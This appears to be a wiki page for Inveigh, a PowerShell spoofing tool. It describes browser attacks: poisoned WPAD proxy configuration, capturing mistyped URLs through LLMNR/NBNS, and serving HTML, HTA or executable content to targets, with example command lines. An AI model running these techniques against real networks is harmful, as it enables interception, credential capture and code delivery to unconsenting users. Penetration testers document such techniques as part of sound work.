Browser Attacks
Inveigh can be configured to deliver wpad.dat files intended to configure an external proxy (not Inveigh) within a target’s web browser. Once the proxy has been configured, it can be leveraged for man-in-the-middle attacks using tactics not covered in this wiki.
-
Relevant Parameter
WPADDirectHosts
WPADIP
WPADPort
WPADResponse -
Example
Invoke-Inveigh -ConsoleOutput Y -WPADIP 192.168.1.100 -WPADPort 8080 -WPADDirectHosts google.com
In the event that a target mistypes a URL leaving off the top-level domain (e.g., http://redditcom, https://reddit), the name resolution should fall down to LLMNR or NBNS. The result should be that the browser connects directly to Inveigh's HTTP/HTTPS listener. Inveigh can be set to deliver specific content for this scenario. This can include text or code (e.g., HTML, HTA) from the command line, or files stored on the hard drive.
-
Example
Invoke-Inveigh -ConsoleOutput Y -HTTPResponse "<html><head><meta http-equiv='refresh' content='0; url=https://www.youtube.com/watch?v=ys5SlF089nM'></head></html>" -
Relevant Parameters
HTTPContentType
HTTPDefaultEXE
HTTPDefaultFile
HTTPDir
HTTPResponse
Usually, the proxy authentication capture will reset the TCP connection right after Inveigh performs a successful capture. This will trigger the WPAD failover and put the browser in a state to request websites directly. When set to deliver content to a browser, Inveigh will send a single response to a web browser after a proxy authentication capture and then reset the connection. If a browser is configured to request an HTTP (not HTTPS) URL upon launch, Inveigh’s proxy should be able to load content into the browser at launch.
Invoke-Inveigh -ConsoleOutput Y -Proxy -HTTPResponse "hello"
- Relevant Parameters
HTTPContentType
HTTPDefaultEXE
HTTPDefaultFile
HTTPDir
HTTPResponse
Proxy
